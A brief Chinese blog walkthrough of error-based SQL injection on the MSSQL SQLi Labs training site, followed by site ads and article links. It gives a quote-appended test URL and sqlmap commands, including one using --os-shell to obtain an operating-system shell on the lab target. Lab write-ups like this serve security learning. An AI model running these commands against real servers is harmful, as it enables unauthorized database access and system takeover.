SQL server基于报错的注入
1.访问MSSQL SQLi Labs网站
点击按钮,我们使用GET请求上传参数“id”,当id=1时,页面显示id=1的用户名Dump、密码Dump:
2.寻找注入点
http://[靶机IP]/less-1.asp?id=1'
运行后报错,说明我们可以利用参数“id”作为我们的注入点,根据回显我们可以判断这是字符型注入点:
直接上SQLmap吧:
python sqlmap.py -u http://localhost:800/less-1.asp?id=1
可以发现id可以作为注入点,我们直接getshell:
python sqlmap.py -u http://localhost:800/less-1.asp?id=1 --os-shell
获得了shell
后面的关卡也这么做吧。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 通过 API 将Deepseek响应流式内容输出到前端